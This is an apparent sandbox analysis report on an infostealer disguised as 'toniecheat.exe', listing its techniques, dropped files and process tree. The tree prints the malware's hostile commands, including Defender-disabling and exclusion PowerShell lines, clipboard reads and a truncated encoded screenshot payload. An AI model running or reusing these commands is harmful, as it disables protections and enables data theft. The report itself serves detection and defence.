b63155f617da18b3d56a178921a60cffb4cfb227142ed2f9989ce52655969d72

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 22:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

toniecheat.exe
Size

24.4MB
MD5

d107cbeaef45f5cd7ddbb0d88e683aef
SHA1

db2a52cefd9414a14ef3b31b9bddb4b290de71f0
SHA256

b63155f617da18b3d56a178921a60cffb4cfb227142ed2f9989ce52655969d72
SHA512

cce1a2066ccb44ead1990506115760a501b516e4df6facd33eaf4fd9728fef9e8705f59da607fb0ffe10e987fda06c73d053649bb54a619c6fc7d1833938da8d
SSDEEP

786432:/TEGs1OEi/UMnspKXk8BEWL11JDjszSljW21:m1Ob8YXvJv1Yza

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2952 powershell.exe
2928 powershell.exe
4712 powershell.exe
1716 powershell.exe
1220 powershell.exe
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
collection

Clipboard Data
T1115

Processes:

cmd.exepowershell.exe

pid process

1516 cmd.exe
3324 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

bound.exerar.exe

pid process

5088 bound.exe
4972 rar.exe

pid	process
2952	powershell.exe
2928	powershell.exe
4712	powershell.exe
1716	powershell.exe
1220	powershell.exe

pid	process
1516	cmd.exe
3324	powershell.exe

pid	process
5088	bound.exe
4972	rar.exe

Loads dropped DLL 18 IoCs

Processes:

toniecheat.exebound.exe

pid	process
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
3584	toniecheat.exe
5088	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates processes with tasklist 1 TTPs 3 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

2692 tasklist.exe
3536 tasklist.exe
4420 tasklist.exe

flow	ioc
16	ip-api.com

pid	process
2692	tasklist.exe
3536	tasklist.exe
4420	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI32242\python311.dll	upx
behavioral1/memory/3584-26-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_ctypes.pyd	upx
behavioral1/memory/3584-30-0x00007FFDE2B20000-0x00007FFDE2B43000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_queue.pyd	upx
behavioral1/memory/3584-50-0x00007FFDE2B10000-0x00007FFDE2B1F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32242\libcrypto-1_1.dll	upx
behavioral1/memory/3584-56-0x00007FFDE2B70000-0x00007FFDE2B9D000-memory.dmp	upx
behavioral1/memory/3584-58-0x00007FFDE6350000-0x00007FFDE6369000-memory.dmp	upx
behavioral1/memory/3584-60-0x00007FFDE2800000-0x00007FFDE2823000-memory.dmp	upx
behavioral1/memory/3584-62-0x00007FFDD29F0000-0x00007FFDD2B67000-memory.dmp	upx
behavioral1/memory/3584-64-0x00007FFDE2B50000-0x00007FFDE2B69000-memory.dmp	upx
behavioral1/memory/3584-66-0x00007FFDE27F0000-0x00007FFDE27FD000-memory.dmp	upx
behavioral1/memory/3584-68-0x00007FFDE2730000-0x00007FFDE275E000-memory.dmp	upx
behavioral1/memory/3584-74-0x00007FFDD2670000-0x00007FFDD29E8000-memory.dmp	upx
behavioral1/memory/3584-76-0x00007FFDE2B20000-0x00007FFDE2B43000-memory.dmp	upx
behavioral1/memory/3584-73-0x00007FFDE2320000-0x00007FFDE23D8000-memory.dmp	upx
behavioral1/memory/3584-72-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp	upx
behavioral1/memory/3584-78-0x00007FFDE2710000-0x00007FFDE2724000-memory.dmp	upx
behavioral1/memory/3584-81-0x00007FFDE2700000-0x00007FFDE270D000-memory.dmp	upx
behavioral1/memory/3584-80-0x00007FFDE2B70000-0x00007FFDE2B9D000-memory.dmp	upx
behavioral1/memory/3584-84-0x00007FFDD19D0000-0x00007FFDD1AEC000-memory.dmp	upx
behavioral1/memory/3584-103-0x00007FFDE2800000-0x00007FFDE2823000-memory.dmp	upx
behavioral1/memory/3584-131-0x00007FFDD29F0000-0x00007FFDD2B67000-memory.dmp	upx
behavioral1/memory/3584-137-0x00007FFDE2B50000-0x00007FFDE2B69000-memory.dmp	upx
behavioral1/memory/3584-231-0x00007FFDE2730000-0x00007FFDE275E000-memory.dmp	upx
behavioral1/memory/3584-234-0x00007FFDE2320000-0x00007FFDE23D8000-memory.dmp	upx
behavioral1/memory/3584-235-0x00007FFDD2670000-0x00007FFDD29E8000-memory.dmp	upx
behavioral1/memory/3584-270-0x00007FFDE2B20000-0x00007FFDE2B43000-memory.dmp	upx
behavioral1/memory/3584-275-0x00007FFDD29F0000-0x00007FFDD2B67000-memory.dmp	upx
behavioral1/memory/3584-269-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp	upx
behavioral1/memory/3584-308-0x00007FFDE2320000-0x00007FFDE23D8000-memory.dmp	upx
behavioral1/memory/3584-309-0x00007FFDD2670000-0x00007FFDD29E8000-memory.dmp	upx
behavioral1/memory/3584-307-0x00007FFDE2730000-0x00007FFDE275E000-memory.dmp	upx
behavioral1/memory/3584-306-0x00007FFDE27F0000-0x00007FFDE27FD000-memory.dmp	upx
behavioral1/memory/3584-305-0x00007FFDE2B50000-0x00007FFDE2B69000-memory.dmp	upx
behavioral1/memory/3584-304-0x00007FFDD29F0000-0x00007FFDD2B67000-memory.dmp	upx
behavioral1/memory/3584-303-0x00007FFDE2800000-0x00007FFDE2823000-memory.dmp	upx
behavioral1/memory/3584-302-0x00007FFDE6350000-0x00007FFDE6369000-memory.dmp	upx
behavioral1/memory/3584-301-0x00007FFDE2B70000-0x00007FFDE2B9D000-memory.dmp	upx
behavioral1/memory/3584-300-0x00007FFDE2B10000-0x00007FFDE2B1F000-memory.dmp	upx
behavioral1/memory/3584-299-0x00007FFDE2B20000-0x00007FFDE2B43000-memory.dmp	upx
behavioral1/memory/3584-298-0x00007FFDD19D0000-0x00007FFDD1AEC000-memory.dmp	upx
behavioral1/memory/3584-297-0x00007FFDE2700000-0x00007FFDE270D000-memory.dmp	upx
behavioral1/memory/3584-296-0x00007FFDE2710000-0x00007FFDE2724000-memory.dmp	upx
behavioral1/memory/3584-284-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2208 WMIC.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3124 systeminfo.exe

pid	process
2208	WMIC.exe

pid	process
3124	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exebound.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4712	powershell.exe
2952	powershell.exe
4712	powershell.exe
2928	powershell.exe
2928	powershell.exe
2952	powershell.exe
5088	bound.exe
5088	bound.exe
3324	powershell.exe
3324	powershell.exe
3620	powershell.exe
3620	powershell.exe
5088	bound.exe
5088	bound.exe
3620	powershell.exe
3324	powershell.exe
5088	bound.exe
5088	bound.exe
1716	powershell.exe
1716	powershell.exe
2832	powershell.exe
2832	powershell.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
1220	powershell.exe
1220	powershell.exe
5088	bound.exe
5088	bound.exe
2452	powershell.exe
2452	powershell.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe
5088	bound.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2692	tasklist.exe
Token: SeDebugPrivilege	4420	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1288	WMIC.exe
Token: SeSecurityPrivilege	1288	WMIC.exe
Token: SeTakeOwnershipPrivilege	1288	WMIC.exe
Token: SeLoadDriverPrivilege	1288	WMIC.exe
Token: SeSystemProfilePrivilege	1288	WMIC.exe
Token: SeSystemtimePrivilege	1288	WMIC.exe
Token: SeProfSingleProcessPrivilege	1288	WMIC.exe
Token: SeIncBasePriorityPrivilege	1288	WMIC.exe
Token: SeCreatePagefilePrivilege	1288	WMIC.exe
Token: SeBackupPrivilege	1288	WMIC.exe
Token: SeRestorePrivilege	1288	WMIC.exe
Token: SeShutdownPrivilege	1288	WMIC.exe
Token: SeDebugPrivilege	1288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1288	WMIC.exe
Token: SeRemoteShutdownPrivilege	1288	WMIC.exe
Token: SeUndockPrivilege	1288	WMIC.exe
Token: SeManageVolumePrivilege	1288	WMIC.exe
Token: 33	1288	WMIC.exe
Token: 34	1288	WMIC.exe
Token: 35	1288	WMIC.exe
Token: 36	1288	WMIC.exe
Token: SeDebugPrivilege	3536	tasklist.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeIncreaseQuotaPrivilege	1288	WMIC.exe
Token: SeSecurityPrivilege	1288	WMIC.exe
Token: SeTakeOwnershipPrivilege	1288	WMIC.exe
Token: SeLoadDriverPrivilege	1288	WMIC.exe
Token: SeSystemProfilePrivilege	1288	WMIC.exe
Token: SeSystemtimePrivilege	1288	WMIC.exe
Token: SeProfSingleProcessPrivilege	1288	WMIC.exe
Token: SeIncBasePriorityPrivilege	1288	WMIC.exe
Token: SeCreatePagefilePrivilege	1288	WMIC.exe
Token: SeBackupPrivilege	1288	WMIC.exe
Token: SeRestorePrivilege	1288	WMIC.exe
Token: SeShutdownPrivilege	1288	WMIC.exe
Token: SeDebugPrivilege	1288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1288	WMIC.exe
Token: SeRemoteShutdownPrivilege	1288	WMIC.exe
Token: SeUndockPrivilege	1288	WMIC.exe
Token: SeManageVolumePrivilege	1288	WMIC.exe
Token: 33	1288	WMIC.exe
Token: 34	1288	WMIC.exe
Token: 35	1288	WMIC.exe
Token: 36	1288	WMIC.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeIncreaseQuotaPrivilege	4580	WMIC.exe
Token: SeSecurityPrivilege	4580	WMIC.exe
Token: SeTakeOwnershipPrivilege	4580	WMIC.exe
Token: SeLoadDriverPrivilege	4580	WMIC.exe
Token: SeSystemProfilePrivilege	4580	WMIC.exe
Token: SeSystemtimePrivilege	4580	WMIC.exe
Token: SeProfSingleProcessPrivilege	4580	WMIC.exe
Token: SeIncBasePriorityPrivilege	4580	WMIC.exe
Token: SeCreatePagefilePrivilege	4580	WMIC.exe
Token: SeBackupPrivilege	4580	WMIC.exe
Token: SeRestorePrivilege	4580	WMIC.exe
Token: SeShutdownPrivilege	4580	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

toniecheat.exetoniecheat.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.execmd.execsc.exe

description	pid	process	target process
PID 3224 wrote to memory of 3584	3224	toniecheat.exe	toniecheat.exe
PID 3224 wrote to memory of 3584	3224	toniecheat.exe	toniecheat.exe
PID 3584 wrote to memory of 3180	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 3180	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2576	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2576	3584	toniecheat.exe	cmd.exe
PID 2576 wrote to memory of 4712	2576	cmd.exe	powershell.exe
PID 2576 wrote to memory of 4712	2576	cmd.exe	powershell.exe
PID 3180 wrote to memory of 2952	3180	cmd.exe	powershell.exe
PID 3180 wrote to memory of 2952	3180	cmd.exe	powershell.exe
PID 3584 wrote to memory of 2428	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2428	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 4152	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 4152	3584	toniecheat.exe	cmd.exe
PID 2428 wrote to memory of 2928	2428	cmd.exe	powershell.exe
PID 2428 wrote to memory of 2928	2428	cmd.exe	powershell.exe
PID 4152 wrote to memory of 5088	4152	cmd.exe	bound.exe
PID 4152 wrote to memory of 5088	4152	cmd.exe	bound.exe
PID 3584 wrote to memory of 1808	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 1808	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2364	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2364	3584	toniecheat.exe	cmd.exe
PID 1808 wrote to memory of 2692	1808	cmd.exe	tasklist.exe
PID 1808 wrote to memory of 2692	1808	cmd.exe	tasklist.exe
PID 2364 wrote to memory of 4420	2364	cmd.exe	tasklist.exe
PID 2364 wrote to memory of 4420	2364	cmd.exe	tasklist.exe
PID 3584 wrote to memory of 1516	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 1516	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 1984	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 1984	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 3528	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 3528	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 4160	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 4160	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 388	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 388	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2708	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2708	3584	toniecheat.exe	cmd.exe
PID 4160 wrote to memory of 4508	4160	cmd.exe	tree.com
PID 4160 wrote to memory of 4508	4160	cmd.exe	tree.com
PID 3528 wrote to memory of 1288	3528	cmd.exe	WMIC.exe
PID 3528 wrote to memory of 1288	3528	cmd.exe	WMIC.exe
PID 1516 wrote to memory of 3324	1516	cmd.exe	powershell.exe
PID 1516 wrote to memory of 3324	1516	cmd.exe	powershell.exe
PID 1984 wrote to memory of 3536	1984	cmd.exe	tasklist.exe
PID 1984 wrote to memory of 3536	1984	cmd.exe	tasklist.exe
PID 2708 wrote to memory of 3620	2708	cmd.exe	powershell.exe
PID 2708 wrote to memory of 3620	2708	cmd.exe	powershell.exe
PID 388 wrote to memory of 3124	388	cmd.exe	systeminfo.exe
PID 388 wrote to memory of 3124	388	cmd.exe	systeminfo.exe
PID 3584 wrote to memory of 2232	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 2232	3584	toniecheat.exe	cmd.exe
PID 2232 wrote to memory of 2164	2232	cmd.exe	tree.com
PID 2232 wrote to memory of 2164	2232	cmd.exe	tree.com
PID 3584 wrote to memory of 816	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 816	3584	toniecheat.exe	cmd.exe
PID 3620 wrote to memory of 4512	3620	powershell.exe	csc.exe
PID 3620 wrote to memory of 4512	3620	powershell.exe	csc.exe
PID 816 wrote to memory of 3728	816	cmd.exe	tree.com
PID 816 wrote to memory of 3728	816	cmd.exe	tree.com
PID 4512 wrote to memory of 1612	4512	csc.exe	Conhost.exe
PID 4512 wrote to memory of 1612	4512	csc.exe	Conhost.exe
PID 3584 wrote to memory of 3272	3584	toniecheat.exe	cmd.exe
PID 3584 wrote to memory of 3272	3584	toniecheat.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\toniecheat.exe
"C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3224
- C:\Users\Admin\AppData\Local\Temp\toniecheat.exe
  "C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\toniecheat.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\toniecheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:388
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQA